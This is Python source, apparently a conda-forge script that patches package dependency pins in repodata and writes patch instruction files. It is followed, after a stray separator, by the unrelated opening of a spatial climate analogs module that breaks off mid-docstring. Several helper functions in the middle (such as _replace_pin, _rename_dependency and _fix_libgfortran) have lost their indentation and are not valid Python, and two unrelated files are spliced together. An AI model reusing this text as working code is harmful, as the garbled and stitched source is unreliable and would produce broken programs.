    """Make any changes to the index by adjusting the values directly.

    This function returns the new index with the adjustments.
    Finally, the new and old indices are then diff'ed to produce the repo
    data patches.

    Parameters
    ----------
    repodata : dict
        Raw repodata (must contain a "packages" mapping of filename -> record).
    subdir : str
        Platform subdir being patched (e.g. "linux-64", "noarch").

    Returns
    -------
    dict
        A deep-copied, patched index; the input repodata is not modified.
    """
    index = copy.deepcopy(repodata["packages"])

    # deal with windows vc features
    if subdir.startswith("win-"):
        python_vc_deps = {
            '2.6': 'vc 9.*',
            '2.7': 'vc 9.*',
            '3.3': 'vc 10.*',
            '3.4': 'vc 10.*',
            '3.5': 'vc 14.*',
            '3.6': 'vc 14.*',
            '3.7': 'vc 14.*',
        }
        for fn, record in index.items():
            record_name = record['name']
            if record_name == 'python':
                # remove the track_features key
                if 'track_features' in record:
                    record['track_features'] = None
                # add a vc dependency
                if not any(d.startswith('vc') for d in record['depends']):
                    depends = record['depends']
                    depends.append(python_vc_deps[record['version'][:3]])
                    record['depends'] = depends
            elif 'vc' in record.get('features', ''):
                # remove vc from the features key
                vc_version = _extract_and_remove_vc_feature(record)
                if vc_version:
                    # add a vc dependency
                    if not any(d.startswith('vc') for d in record['depends']):
                        depends = record['depends']
                        depends.append('vc %d.*' % vc_version)
                        record['depends'] = depends

    proj4_fixes = {"cartopy", "cdo", "gdal", "libspatialite", "pynio", "qgis"}
    for fn, record in index.items():
        record_name = record["name"]

        if record.get('timestamp', 0) < 1604417730000:
            if subdir == 'noarch':
                remove_python_abi(record)
            else:
                add_python_abi(record, subdir)

        if "license" in record and "license_family" not in record and record["license"]:
            family = get_license_family(record["license"])
            if family:
                record['license_family'] = family

        # remove dependency from constrains for twisted
        if record_name == "twisted":
            new_constrains = [dep for dep in record.get('constrains', ())
                              if not dep.startswith("pyobjc-framework-cococa")]
            if new_constrains != record.get('constrains', ()):
                record['constrains'] = new_constrains

        if record_name == "starlette-base":
            if not any(dep.split(' ')[0] == "starlette" for dep in record.get('constrains', ())):
                if 'constrains' in record:
                    record['constrains'].append(f"starlette {record['version']}")
                else:
                    record['constrains'] = [f"starlette {record['version']}"]

        if record_name == "pytorch" and record.get('timestamp', 0) < 1610297816658:
            # https://github.com/conda-forge/pytorch-cpu-feedstock/issues/29
            if not any(dep.split(' ')[0] == 'typing_extensions'
                       for dep in record.get('depends', ())):
                if 'depends' in record:
                    record['depends'].append("typing_extensions")
                else:
                    record['depends'] = ["typing_extensions"]

        if record_name == "ipython" and record.get('timestamp', 0) < 1609621539000:
            # https://github.com/conda-forge/ipython-feedstock/issues/127
            if any(dep.split(' ')[0] == "jedi" for dep in record.get('depends', ())):
                record['depends'].append('jedi <0.18')

        if record_name == "kartothek" and record.get('timestamp', 0) < 1611565264000:
            # https://github.com/conda-forge/kartothek-feedstock/issues/36
            if "zstandard" in record['depends']:
                i = record['depends'].index('zstandard')
                record['depends'][i] = 'zstandard <0.15'

        if record_name == "gitdb" and record['version'].startswith('4.0.') and 'smmap >=3.0.1' in record['depends']:
            i = record['depends'].index('smmap >=3.0.1')
            record['depends'][i] = 'smmap >=3.0.1,<4'

        if record_name == "arrow-cpp":
            if not any(dep.split(' ')[0] == "arrow-cpp-proc" for dep in record.get('constrains', ())):
                if 'constrains' in record:
                    record['constrains'].append("arrow-cpp-proc * cpu")
                else:
                    record['constrains'] = ["arrow-cpp-proc * cpu"]

            if "aws-sdk-cpp" in record['depends']:
                i = record['depends'].index('aws-sdk-cpp')
                record['depends'][i] = 'aws-sdk-cpp 1.7.164'

        if record_name == "pyarrow":
            if not any(dep.split(' ')[0] == "arrow-cpp-proc" for dep in record.get('constrains', ())):
                if 'constrains' in record:
                    record['constrains'].append("arrow-cpp-proc * cpu")
                else:
                    record['constrains'] = ["arrow-cpp-proc * cpu"]

        if record_name == "kartothek":
            if record["version"] in ["3.15.0", "3.15.1", "3.16.0"] \
                    and "pyarrow >=0.13.0,!=0.14.0,<2" in record["depends"]:
                i = record["depends"].index("pyarrow >=0.13.0,!=0.14.0,<2")
                record["depends"][i] = "pyarrow >=0.17.1,<2"

        # distributed <2.11.0 does not work with msgpack-python >=1.0
        # newer versions of distributed require at least msgpack-python >=0.6.0
        # so we can fix cases where msgpack-python is unbounded
        # https://github.com/conda-forge/distributed-feedstock/pull/114
        if record_name == 'distributed':
            if 'msgpack-python' in record['depends']:
                i = record['depends'].index('msgpack-python')
                record['depends'][i] = 'msgpack-python <1.0.0'

        # python-language-server <=0.31.9 requires pyflakes <2.2.2
        # included explicitly in 0.31.10+
        # https://github.com/conda-forge/python-language-server-feedstock/pull/50
        version = record['version']
        if record_name == 'python-language-server':
            pversion = pkg_resources.parse_version(version)
            v0_31_9 = pkg_resources.parse_version('0.31.9')
            if pversion <= v0_31_9 and 'pyflakes >=1.6.0' in record['depends']:
                i = record['depends'].index('pyflakes >=1.6.0')
                record['depends'][i] = 'pyflakes >=1.6.0,<2.2.0'

        # aioftp >=0.17.0 requires python >=3.7
        # aioftp 0.17.x was incorrectly built with 3.6 support
        # https://github.com/conda-forge/aioftp-feedstock/pull/12
        version = record['version']
        if record_name == 'aioftp':
            pversion = pkg_resources.parse_version(version)
            base_version = pkg_resources.parse_version('0.17.0')
            max_version = pkg_resources.parse_version('0.17.2')
            if base_version <= pversion <= max_version and 'python >=3.6' in record['depends']:
                i = record['depends'].index('python >=3.6')
                record['depends'][i] = 'python >=3.7'

        # numpydoc >=1.0.0 requires python >=3.5
        # https://github.com/conda-forge/numpydoc-feedstock/pull/14
        version = record['version']
        if record_name == 'numpydoc':
            pversion = pkg_resources.parse_version(version)
            v1_0_0 = pkg_resources.parse_version('1.0.0')
            v1_1_0 = pkg_resources.parse_version('1.1.0')
            if v1_0_0 <= pversion <= v1_1_0 and 'python' in record['depends']:
                i = record['depends'].index('python')
                record['depends'][i] = 'python >=3.5'

        # pip >=21 requires python >=3.6 but the first build has >=3
        # https://github.com/conda-forge/pip-feedstock/pull/68
        if record_name == 'pip':
            if record['version'] == "21.0" and record['build'] == "pyhd8ed1ab_0":
                i = record['depends'].index('python >=3')
                record['depends'][i] = 'python >=3.6'

        # fix deps with wrong names
        if record_name in proj4_fixes:
            _rename_dependency(fn, record, "proj.4", "proj4")

        if record_name == "airflow-with-async":
            _rename_dependency(fn, record, "evenlet", "eventlet")

        if record_name == "iris":
            _rename_dependency(fn, record, "nc_time_axis", "nc-time-axis")

        if (record_name == "r-base" and
                not any(dep.startswith("_r-mutex ")
                        for dep in record["depends"])):
            depends = record["depends"]
            depends.append("_r-mutex 1.* anacondar_1")
            record["depends"] = depends

        if record_name == "gcc_impl_{}".format(subdir):
            _relax_exact(fn, record, "binutils_impl_{}".format(subdir))

        deps = record.get("depends", ())
        if "ntl" in deps and record_name != "sage":
            _rename_dependency(fn, record, "ntl", "ntl 10.3.0")

        if "libiconv >=1.15,<1.16.0a0" in deps:
            _pin_looser(fn, record, "libiconv", upper_bound="1.17.0")

        if 're2' in deps and record.get('timestamp', 0) < 1588349339243:
            _rename_dependency(fn, record, "re2", "re2 <2020.05.01")

        if 'libffi' in deps and record.get('timestamp', 0) < 1605980936031:
            _rename_dependency(fn, record, "libffi", "libffi <3.3.0.a0")

        if 'libffi >=3.2.1,<4.0a0' in deps and record.get('timestamp', 0) < 1605980936031:
            _pin_stricter(fn, record, "libffi", "x.x")

        _relax_libssh2_1_x_pinning(fn, record)

        if any(dep.startswith("gf2x") for dep in deps):
            _pin_stricter(fn, record, "gf2x", "x.x")

        if any(dep.startswith("libnetcdf >=4.7.3") for dep in deps):
            _pin_stricter(fn, record, "libnetcdf", "x.x.x.x")

        if any(dep.startswith("libarchive >=3.3") for dep in deps):
            _pin_looser(fn, record, "libarchive", upper_bound="3.6.0")

        # fix only packages built before the run_exports was corrected.
        if any(dep == "libflang" or dep.startswith("libflang >=5.0.0") for dep in deps) and record.get('timestamp', 0) < 1611789153000:
            record["depends"].append("libflang <6.0.0.a0")

        if any(dep.startswith("libignition-") or dep == 'libsdformat' for dep in deps):
            for dep_idx, _ in enumerate(deps):
                dep = record['depends'][dep_idx]
                if dep.startswith('libignition-'):
                    _pin_looser(fn, record, dep.split(" ")[0], max_pin="x")
                if dep.startswith('libsdformat '):
                    _pin_looser(fn, record, dep.split(" ")[0], max_pin="x")

        # this doesn't seem to match the _pin_looser or _pin_stricter patterns
        # nor _replace_pin
        if record_name == "jedi" and record.get("timestamp", 0) < 1592619891258:
            for i, dep in enumerate(record["depends"]):
                if dep.startswith("parso") and "<" not in dep:
                    _dep_parts = dep.split(" ")
                    _dep_parts[1] = _dep_parts[1] + ",<0.8.0"
                    record["depends"][i] = " ".join(_dep_parts)

        # FIXME: disable patching-out blas_openblas feature
        # because hotfixes are not applied to gcc7 label
        # causing inconsistent behavior
        # if (record_name == "blas" and
        #         record["track_features"] == "blas_openblas"):
        #     instructions["packages"][fn]["track_features"] = None
        # if "features" in record:
        #     if "blas_openblas" in record["features"]:
        #         # remove blas_openblas feature
        #         instructions["packages"][fn]["features"] = _extract_feature(
        #             record, "blas_openblas")
        #         if not any(d.startswith("blas ") for d in record["depends"]):
        #             depends = record['depends']
        #             depends.append("blas 1.* openblas")
        #             instructions["packages"][fn]["depends"] = depends

        if any(dep.startswith("zstd >=1.4") for dep in deps):
            _pin_looser(fn, record, "zstd", max_pin="x.x")

        # We pin MPI packages loosely so as to rely on their ABI compatibility
        if any(dep.startswith("openmpi >=4.0") for dep in deps):
            _pin_looser(fn, record, "openmpi", upper_bound="5.0")
        if any(dep.startswith("mpich >=3.3") for dep in deps):
            _pin_looser(fn, record, "mpich", upper_bound="4.0")

        _replace_pin('libunwind >=1.2.1,<1.3.0a0', 'libunwind >=1.2.1,<2.0.0a0', deps, record)
        _replace_pin('snappy >=1.1.7,<1.1.8.0a0', 'snappy >=1.1.7,<2.0.0.0a0', deps, record)
        _replace_pin('ncurses >=6.1,<6.2.0a0', 'ncurses >=6.1,<6.3.0a0', deps, record)
        _replace_pin('abseil-cpp', 'abseil-cpp =20190808', deps, record)
        if record_name not in ["blas", "libblas", "libcblas", "liblapack",
                               "liblapacke", "lapack", "blas-devel"]:
            _replace_pin('liblapack >=3.8.0,<3.9.0a0', 'liblapack >=3.8.0,<4.0.0a0', deps, record)
            _replace_pin('liblapacke >=3.8.0,<3.9.0a0', 'liblapacke >=3.8.0,<4.0.0a0', deps, record)

        # Filter by timestamp as pythia8 also contains python bindings that shouldn't be pinned
        if 'pythia8' in deps and record.get('timestamp', 0) < 1584264455759:
            i = record['depends'].index('pythia8')
            record['depends'][i] = 'pythia8 >=8.240,<8.300.0a0'

        # remove features for openjdk and rb2
        if ("track_features" in record and
                record['track_features'] is not None):
            for feat in record["track_features"].split():
                if feat.startswith(("rb2", "openjdk")):
                    record["track_features"] = _extract_track_feature(
                        record, feat)

        llvm_pkgs = ["libclang", "clang", "clang-tools", "llvm", "llvm-tools", "llvmdev"]
        for llvm in ["libllvm8", "libllvm9"]:
            if any(dep.startswith(llvm) for dep in deps):
                if record_name not in llvm_pkgs:
                    _relax_exact(fn, record, llvm, max_pin="x.x")
                else:
                    _relax_exact(fn, record, llvm, max_pin="x.x.x")

        if record_name in llvm_pkgs:
            new_constrains = record.get('constrains', [])
            version = record["version"]
            for pkg in llvm_pkgs:
                if record_name == pkg:
                    continue
                if pkg in new_constrains:
                    # BUGFIX: `new_constrains` is a list, so the original
                    # `del new_constrains[pkg]` raised TypeError (string index
                    # into a list). Remove the bare entry by value instead.
                    new_constrains.remove(pkg)
                if any(constraint.startswith(f"{pkg} ") for constraint in new_constrains):
                    continue
                new_constrains.append(f'{pkg} {version}.*')
            record['constrains'] = new_constrains

        # make sure the libgfortran version is bound from 3 to 4 for osx
        if subdir == "osx-64":
            _fix_libgfortran(fn, record)
            _fix_libcxx(fn, record)

            full_pkg_name = fn.replace('.tar.bz2', '')
            if full_pkg_name in OSX_SDK_FIXES:
                _set_osx_virt_min(fn, record, OSX_SDK_FIXES[full_pkg_name])

        # make old binutils packages conflict with the new sysroot packages
        # that have renamed the sysroot from conda_cos6 or conda_cos7 to just
        # conda
        if (
            subdir in ["linux-64", "linux-aarch64", "linux-ppc64le"]
            and record_name in [
                "binutils", "binutils_impl_" + subdir, "ld_impl_" + subdir]
            and record.get('timestamp', 0) < 1589953178153  # 2020-05-20
        ):
            new_constrains = record.get('constrains', [])
            new_constrains.append("sysroot_" + subdir + " ==99999999999")
            record["constrains"] = new_constrains

        # make sure the old compilers conflict with the new sysroot packages
        # and they only use libraries from the old compilers
        if (
            subdir in ["linux-64", "linux-aarch64", "linux-ppc64le"]
            and record_name in [
                "gcc_impl_" + subdir, "gxx_impl_" + subdir, "gfortran_impl_" + subdir]
            and record['version'] in ['5.4.0', '7.2.0', '7.3.0', '8.2.0']
        ):
            new_constrains = record.get('constrains', [])
            for pkg in ["libgcc-ng", "libstdcxx-ng", "libgfortran", "libgomp"]:
                new_constrains.append("{} 5.4.*|7.2.*|7.3.*|8.2.*|9.1.*|9.2.*".format(pkg))
            new_constrains.append("binutils_impl_" + subdir + " <2.34")
            new_constrains.append("ld_impl_" + subdir + " <2.34")
            new_constrains.append("sysroot_" + subdir + " ==99999999999")
            record["constrains"] = new_constrains

        # we pushed a few builds of the compilers past the list of versions
        # above which do not use the sysroot packages - this block catches those
        # it will also break some test builds of the new compilers but we should
        # not be using those anyways and they are marked as broken.
        if (
            subdir in ["linux-64", "linux-aarch64", "linux-ppc64le"]
            and record_name in [
                "gcc_impl_" + subdir, "gxx_impl_" + subdir, "gfortran_impl_" + subdir]
            and record['version'] not in ['5.4.0', '7.2.0', '7.3.0', '8.2.0']
            and not any(__r.startswith("sysroot_") for __r in record.get("depends", []))
        ):
            new_constrains = record.get('constrains', [])
            new_constrains.append("sysroot_" + subdir + " ==99999999999")
            record["constrains"] = new_constrains

        # all ctng activation packages that don't depend on the sysroot_*
        # packages are not compatible with the new sysroot_*-based compilers
        # root and cling must also be included as they have a builtin C++ interpreter
        if (
            subdir in ["linux-64", "linux-aarch64", "linux-ppc64le"]
            and record_name in [
                "gcc_" + subdir, "gxx_" + subdir, "gfortran_" + subdir,
                "binutils_" + subdir, "gcc_bootstrap_" + subdir, "root_base", "cling"]
            and not any(__r.startswith("sysroot_") for __r in record.get("depends", []))
        ):
            new_constrains = record.get('constrains', [])
            new_constrains.append("sysroot_" + subdir + " ==99999999999")
            record["constrains"] = new_constrains

        # old CDTs with the conda_cos6 or conda_cos7 name in the sysroot need to
        # conflict with the new CDT and compiler packages
        # all of the new CDTs and compilers depend on the sysroot_{subdir} packages
        # so we use a constraint on those
        if (
            subdir == "noarch"
            and (
                record_name.endswith("-cos6-x86_64") or
                record_name.endswith("-cos7-x86_64") or
                record_name.endswith("-cos7-aarch64") or
                record_name.endswith("-cos7-ppc64le")
            )
            and not record_name.startswith("sysroot-")
            and not any(__r.startswith("sysroot_") for __r in record.get("depends", []))
        ):
            if record_name.endswith("x86_64"):
                sys_subdir = "linux-64"
            elif record_name.endswith("aarch64"):
                sys_subdir = "linux-aarch64"
            elif record_name.endswith("ppc64le"):
                sys_subdir = "linux-ppc64le"

            new_constrains = record.get('constrains', [])
            if not any(__r.startswith("sysroot_") for __r in new_constrains):
                new_constrains.append("sysroot_" + sys_subdir + " ==99999999999")
            record["constrains"] = new_constrains

        # make sure pybind11 and pybind11-global have run constraints on
        # the abi metapackage
        # see https://github.com/conda-forge/conda-forge-repodata-patches-feedstock/issues/104  # noqa
        if (
            record_name in ["pybind11", "pybind11-global"]
            # this version has a constraint sometimes
            and (
                pkg_resources.parse_version(record["version"])
                <= pkg_resources.parse_version("2.6.1")
            )
            and not any(
                c.startswith("pybind11-abi ")
                for c in record.get("constrains", [])
            )
        ):
            _add_pybind11_abi_constraint(fn, record)

        # add *lal>=7.1.1 as run_constrained for liblal-7.1.1
        if (
            record_name == "liblal"
            and record['version'] == "7.1.1"
            and record['build_number'] in (0, 1, 2, 100, 101, 102)
        ):
            record.setdefault('constrains', []).extend((
                "lal >=7.1.1",
                "python-lal >=7.1.1",
            ))

    return index
def _add_pybind11_abi_constraint(fn, record):
    """the pybind11-abi package uses the internals version

    here are the ranges

      v2.2.0 1
      v2.2.1 1
      v2.2.2 1
      v2.2.3 1
      v2.2.4 2
      v2.3.0 3
      v2.4.0 3
      v2.4.1 3
      v2.4.2 3
      v2.4.3 3
      v2.5.0 4
      v2.6.0 4
      v2.6.0b1 4
      v2.6.0rc1 4
      v2.6.0rc2 4
      v2.6.0rc3 4
      v2.6.1 4

    prior to 2.2.0 we set it to 0
    """
    ver = pkg_resources.parse_version(record["version"])

    # Map the pybind11 version onto its internals ABI number.
    if ver < pkg_resources.parse_version("2.2.0"):
        abi_ver = "0"
    elif ver < pkg_resources.parse_version("2.2.4"):
        abi_ver = "1"
    elif ver < pkg_resources.parse_version("2.3.0"):
        abi_ver = "2"
    elif ver < pkg_resources.parse_version("2.5.0"):
        abi_ver = "3"
    elif ver <= pkg_resources.parse_version("2.6.1"):
        abi_ver = "4"
    else:
        # past this we should have a constrains there already
        raise RuntimeError(
            "pybind11 version %s out of range for abi" % record["version"]
        )

    constrains = record.get("constrains", [])
    pin = "pybind11-abi ==" + abi_ver
    # Overwrite the last existing pybind11-abi entry, or append a new one.
    hit = None
    for idx, entry in enumerate(constrains):
        if entry.startswith("pybind11-abi "):
            hit = idx
    if hit is None:
        constrains.append(pin)
    else:
        constrains[hit] = pin
    record["constrains"] = constrains
def _replace_pin(old_pin, new_pin, deps, record):
"""Replace an exact pin with a new one."""
if old_pin in deps:
i = record['depends'].index(old_pin)
record['depends'][i] = new_pin
def _rename_dependency(fn, record, old_name, new_name):
depends = record["depends"]
dep_idx = next(
(q for q, dep in enumerate(depends)
if dep.split(' ')[0] == old_name),
None
)
if dep_idx is not None:
parts = depends[dep_idx].split(" ")
remainder = (" " + " ".join(parts[1:])) if len(parts) > 1 else ""
depends[dep_idx] = new_name + remainder
record['depends'] = depends
def _fix_libgfortran(fn, record):
depends = record.get("depends", ())
dep_idx = next(
(q for q, dep in enumerate(depends)
if dep.split(' ')[0] == "libgfortran"),
None
)
if dep_idx is not None:
# make sure respect minimum versions still there
# 'libgfortran' -> >=3.0.1,<4.0.0.a0
# 'libgfortran ==3.0.1' -> ==3.0.1
# 'libgfortran >=3.0' -> >=3.0,<4.0.0.a0
# 'libgfortran >=3.0.1' -> >=3.0.1,<4.0.0.a0
if ("==" in depends[dep_idx]) or ("<" in depends[dep_idx]):
pass
elif depends[dep_idx] == "libgfortran":
depends[dep_idx] = "libgfortran >=3.0.1,<4.0.0.a0"
record['depends'] = depends
elif ">=3.0.1" in depends[dep_idx]:
depends[dep_idx] = "libgfortran >=3.0.1,<4.0.0.a0"
record['depends'] = depends
elif ">=3.0" in depends[dep_idx]:
depends[dep_idx] = "libgfortran >=3.0,<4.0.0.a0"
record['depends'] = depends
elif ">=4" in depends[dep_idx]:
# catches all of 4.*
depends[dep_idx] = "libgfortran >=4.0.0,<5.0.0.a0"
record['depends'] = depends
def _set_osx_virt_min(fn, record, min_vers):
rconst = record.get("constrains", ())
dep_idx = next(
(q for q, dep in enumerate(rconst)
if dep.split(' ')[0] == "__osx"),
None
)
run_constrained = list(rconst)
if dep_idx is None:
run_constrained.append("__osx >=%s" % min_vers)
if run_constrained:
record['constrains'] = run_constrained
def _fix_libcxx(fn, record):
record_name = record["name"]
if not record_name in ["cctools", "ld64", "llvm-lto-tapi"]:
return
depends = record.get("depends", ())
dep_idx = next(
(q for q, dep in enumerate(depends)
if dep.split(' ')[0] == "libcxx"),
None
)
if dep_idx is not None:
dep_parts = depends[dep_idx].split(" ")
if len(dep_parts) >= 2 and dep_parts[1] == "4.0.1":
# catches all of 4.*
depends[dep_idx] = "libcxx >=4.0.1"
record['depends'] = depends
def pad_list(l, num):
    """Right-pad list *l* with "0" entries until it has at least *num* items.

    Lists already long enough are returned unchanged (same object).
    """
    missing = num - len(l)
    if missing <= 0:
        return l
    return l + ["0"] * missing
def get_upper_bound(version, max_pin):
    """Return the exclusive upper bound implied by *max_pin* for *version*.

    `max_pin` is a conda-style pin template such as "x" or "x.x"; the last
    kept component is incremented and everything after it zeroed, e.g.
    ("1.2.3", "x.x") -> "1.3.0".
    """
    num_x = max_pin.count("x")
    ver = version.split(".")
    # pad to at least num_x components (inlined pad_list)
    if len(ver) < num_x:
        ver = ver + ["0"] * (num_x - len(ver))
    # zero out everything past the pinned granularity, then bump
    ver[num_x:] = ["0"] * (len(ver) - num_x)
    ver[num_x - 1] = str(int(ver[num_x - 1]) + 1)
    return ".".join(ver)
def _relax_exact(fn, record, fix_dep, max_pin=None):
    """Relax an exact "name version build" pin on *fix_dep* to a range pin.

    With `max_pin`, the new pin is ``>=version,<upper a0``; without it, only
    the lower bound ``>=version`` is kept. Specs that already contain an
    operator are left untouched.
    """
    depends = record.get("depends", ())
    hit = next(
        (i for i, dep in enumerate(depends) if dep.split(' ')[0] == fix_dep),
        None,
    )
    if hit is None:
        return
    parts = depends[hit].split(" ")
    is_exact = (
        len(parts) == 3
        and not any(parts[1].startswith(op) for op in OPERATORS)
    )
    if is_exact:
        name, ver = parts[0], parts[1]
        if max_pin is not None:
            upper = get_upper_bound(ver, max_pin) + "a0"
            depends[hit] = "{} >={},<{}".format(name, ver, upper)
        else:
            depends[hit] = "{} >={}".format(name, ver)
    record['depends'] = depends
def _match_strict_libssh2_1_x_pin(dep):
if dep.startswith("libssh2 >=1.8.0,<1.9.0a0"):
return True
if dep.startswith("libssh2 >=1.8.1,<1.9.0a0"):
return True
if dep.startswith("libssh2 >=1.8.2,<1.9.0a0"):
return True
if dep.startswith("libssh2 1.8.*"):
return True
return False
def _relax_libssh2_1_x_pinning(fn, record):
    """Loosen the first over-strict libssh2 1.8.x pin to the 1.x ABI range."""
    depends = record.get("depends", ())
    for i, dep in enumerate(depends):
        if _match_strict_libssh2_1_x_pin(dep):
            depends[i] = "libssh2 >=1.8.0,<2.0.0a0"
            break
cb_pin_regex = re.compile(r"^>=(?P<lower>\d(\.\d+)*a?),<(?P<upper>\d(\.\d+)*)a0$")
def _pin_stricter(fn, record, fix_dep, max_pin):
    """Tighten the upper bound of every conda-build range pin on *fix_dep*.

    For each dependency "name >=lower,<upper a0", a new upper bound is derived
    from the lower bound at `max_pin` granularity; the pin is rewritten only
    when the new bound is *stricter* (lower) than the existing one. Build
    strings are preserved. Mutates the record in place.
    """
    depends = record.get("depends", ())
    dep_indices = [q for q, dep in enumerate(depends) if dep.split(' ')[0] == fix_dep]
    for dep_idx in dep_indices:
        dep_parts = depends[dep_idx].split(" ")
        # only "name spec" or "name spec build" entries are candidates
        if len(dep_parts) not in [2, 3]:
            continue
        m = cb_pin_regex.match(dep_parts[1])
        if m is None:
            continue
        lower = m.group("lower")
        upper = m.group("upper").split(".")
        new_upper = get_upper_bound(lower, max_pin).split(".")
        # pad both bounds to the same number of components before comparing
        upper = pad_list(upper, len(new_upper))
        new_upper = pad_list(new_upper, len(upper))
        # NOTE(review): components are compared as tuples of *strings*, so a
        # two-digit component compares lexicographically ("10" < "9") — TODO
        # confirm no patched version reaches double-digit components here.
        if tuple(upper) > tuple(new_upper):
            if str(new_upper[-1]) != "0":
                new_upper += ["0"]
            depends[dep_idx] = "{} >={},<{}a0".format(dep_parts[0], lower, ".".join(new_upper))
            if len(dep_parts) == 3:
                # re-attach the build string
                depends[dep_idx] = "{} {}".format(depends[dep_idx], dep_parts[2])
            record['depends'] = depends
def _pin_looser(fn, record, fix_dep, max_pin=None, upper_bound=None):
    """Loosen the upper bound of every conda-build range pin on *fix_dep*.

    The new upper bound is either `upper_bound` verbatim or derived from the
    lower bound at `max_pin` granularity; the pin is rewritten only when the
    new bound is *looser* (higher) than the existing one. Build strings are
    preserved. Mutates the record in place.
    """
    depends = record.get("depends", ())
    dep_indices = [q for q, dep in enumerate(depends) if dep.split(' ')[0] == fix_dep]
    for dep_idx in dep_indices:
        dep_parts = depends[dep_idx].split(" ")
        # only "name spec" or "name spec build" entries are candidates
        if len(dep_parts) not in [2, 3]:
            continue
        m = cb_pin_regex.match(dep_parts[1])
        if m is None:
            continue
        lower = m.group("lower")
        upper = m.group("upper").split(".")
        if upper_bound is None:
            new_upper = get_upper_bound(lower, max_pin).split(".")
        else:
            new_upper = upper_bound.split(".")
        # pad both bounds to the same number of components before comparing
        upper = pad_list(upper, len(new_upper))
        new_upper = pad_list(new_upper, len(upper))
        # NOTE(review): components are compared as tuples of *strings*, so a
        # two-digit component compares lexicographically ("10" < "9") — TODO
        # confirm no patched version reaches double-digit components here.
        if tuple(upper) < tuple(new_upper):
            if str(new_upper[-1]) != "0":
                new_upper += ["0"]
            depends[dep_idx] = "{} >={},<{}a0".format(dep_parts[0], lower, ".".join(new_upper))
            if len(dep_parts) == 3:
                # re-attach the build string
                depends[dep_idx] = "{} {}".format(depends[dep_idx], dep_parts[2])
            record['depends'] = depends
def _extract_and_remove_vc_feature(record):
features = record.get('features', '').split()
vc_features = tuple(f for f in features if f.startswith('vc'))
if not vc_features:
return None
non_vc_features = tuple(f for f in features if f not in vc_features)
vc_version = int(vc_features[0][2:]) # throw away all but the first
if non_vc_features:
record['features'] = ' '.join(non_vc_features)
else:
record['features'] = None
return vc_version
def _extract_feature(record, feature_name):
features = record.get('features', '').split()
features.remove(feature_name)
return " ".join(features) or None
def _extract_track_feature(record, feature_name):
features = record.get('track_features', '').split()
features.remove(feature_name)
return " ".join(features) or None
def main():
    """Download repodata for every subdir and write the patch instructions
    JSON files under $PREFIX (or ./tmp when PREFIX is unset)."""
    # Step 1. Collect initial repodata for all subdirs.
    if "CF_SUBDIR" in os.environ:
        # For local debugging
        subdirs = os.environ["CF_SUBDIR"].split(";")
    else:
        subdirs = SUBDIRS
    repodatas = {}
    for subdir in tqdm.tqdm(subdirs, desc="Downloading repodata"):
        url = "/".join(
            (CHANNEL_ALIAS, CHANNEL_NAME, subdir, "repodata_from_packages.json"))
        resp = requests.get(url)
        resp.raise_for_status()
        repodatas[subdir] = resp.json()

    # Step 2. Create all patch instructions.
    prefix_dir = os.getenv("PREFIX", "tmp")
    for subdir in subdirs:
        out_dir = join(prefix_dir, subdir)
        if not isdir(out_dir):
            os.makedirs(out_dir)
        # Step 2a. Generate a new index.
        patched_index = _gen_new_index(repodatas[subdir], subdir)
        # Step 2b. Generate the instructions by diff'ing the indices.
        instructions = _gen_patch_instructions(
            repodatas[subdir]['packages'], patched_index, subdir)
        # Step 2c. Output this to $PREFIX so that we bundle the JSON files.
        out_path = join(out_dir, "patch_instructions.json")
        with open(out_path, 'w') as fh:
            json.dump(
                instructions, fh, indent=2,
                sort_keys=True, separators=(',', ': '))
if __name__ == "__main__":
    # Propagate main()'s return value to the shell (None -> exit status 0).
    sys.exit(main())
|
# -*- encoding: utf8 -*-
# noqa: D205,D400
"""
Spatial analogs
===============
Spatial analogues are maps showing which areas have a present-day climate that is analogous
to the future climate of a given place. This type of map can be useful for climate adaptation
to see how well regions are coping today under specific climate conditions. For example,
officials from a city located in a temperate region that may be expecting more heatwaves in
the future can learn from the experience of another city where heatwaves are a common occurrence,
leading to more proactive intervention plans to better deal with new climate conditions.
Spatial analogues are estimated by comparing the distribution of climate indices computed at
the target location over the future period with the distribution of the same climate indices
computed over a reference period for multiple candidate regions. A number of methodological
choices thus enter the computation:
- Climate indices of interest,
- Metrics measuring the difference between both distributions,
- Reference data from which to compute the base indices,
- A future climate scenario to compute the target indices.
The climate indices chosen to compute the spatial analogues are usually annual values of
indices relevant to the intended audience of these maps. For example, in the case of the
wine grape industry, the climate indices examined could include the length of the frost-free
season, growing degree-days, annual winter minimum temperature and annual number of
very cold days [Roy2017]_.
Methods to compute the (dis)similarity between samples
------------------------------------------------------
This module implements five of the six methods described in [Grenier2013]_ to measure
the dissimilarity between two samples. Some of these algorithms can be used to
test whether or not two samples have been drawn from the same distribution.
Here, they are used to find areas with analog climate conditions to a target
climate.
Methods available
~~~~~~~~~~~~~~~~~
* Standardized Euclidean distance
* Nearest Neighbour distance
* Zech-Aslan energy statistic
* Friedman-Rafsky runs statistic
* Kolmogorov-Smirnov statistic
* Kullback-Leibler divergence
All methods accept arrays, the first is the reference (n, D) and
the second is the candidate (m, D). Where the climate indicators
vary along D and the distribution dimension along n or m. All methods output
a single float.
.. rubric:: References
.. [Roy2017] Roy, P., Grenier, P., Barriault, E. et al. Climatic Change (2017) 143: 43. `<doi:10.1007/s10584-017-1960-x>`_
.. [Grenier2013] Grenier, P., A.-C. Parent, D. Huard, F. Anctil, and D. Chaumont, 2013: An assessment of six dissimilarity metrics for climate analogs. J. Appl. Meteor. Climatol., 52, 733–752, `<doi:10.1175/JAMC-D-12-0170.1>`_
"""
# Code adapted from flyingpigeon.dissimilarity, Nov 2020.
from typing import Sequence, Tuple, Union
import numpy as np
import xarray as xr
from boltons.funcutils import wraps
from pkg_resources import parse_version
from scipy import __version__ as __scipy_version__
from scipy import spatial
from scipy.spatial import cKDTree as KDTree
# TODO: Szekely, G, Rizzo, M (2014) Energy statistics: A class of statistics
# based on distances. J Stat Planning & Inference 143: 1249-1272
# TODO: Hellinger distance
# Registry of metric name -> wrapped implementation, populated by the
# @metric decorator below. (Idiom: use a dict literal, not dict().)
metrics = {}
def spatial_analogs(
    target: xr.Dataset,
    candidates: xr.Dataset,
    dist_dim: Union[str, Sequence[str]] = "time",
    method: str = "kldiv",
    **kwargs,
):
    """Compute dissimilarity statistics between target points and candidate points.

    Spatial analogs based on the comparison of climate indices. The algorithm compares
    the distribution of the reference indices with the distribution of spatially
    distributed candidate indices and returns a value measuring the dissimilarity
    between both distributions over the candidate grid.

    Parameters
    ----------
    target : xr.Dataset
        Dataset of the target indices. Only index variables should be included in the
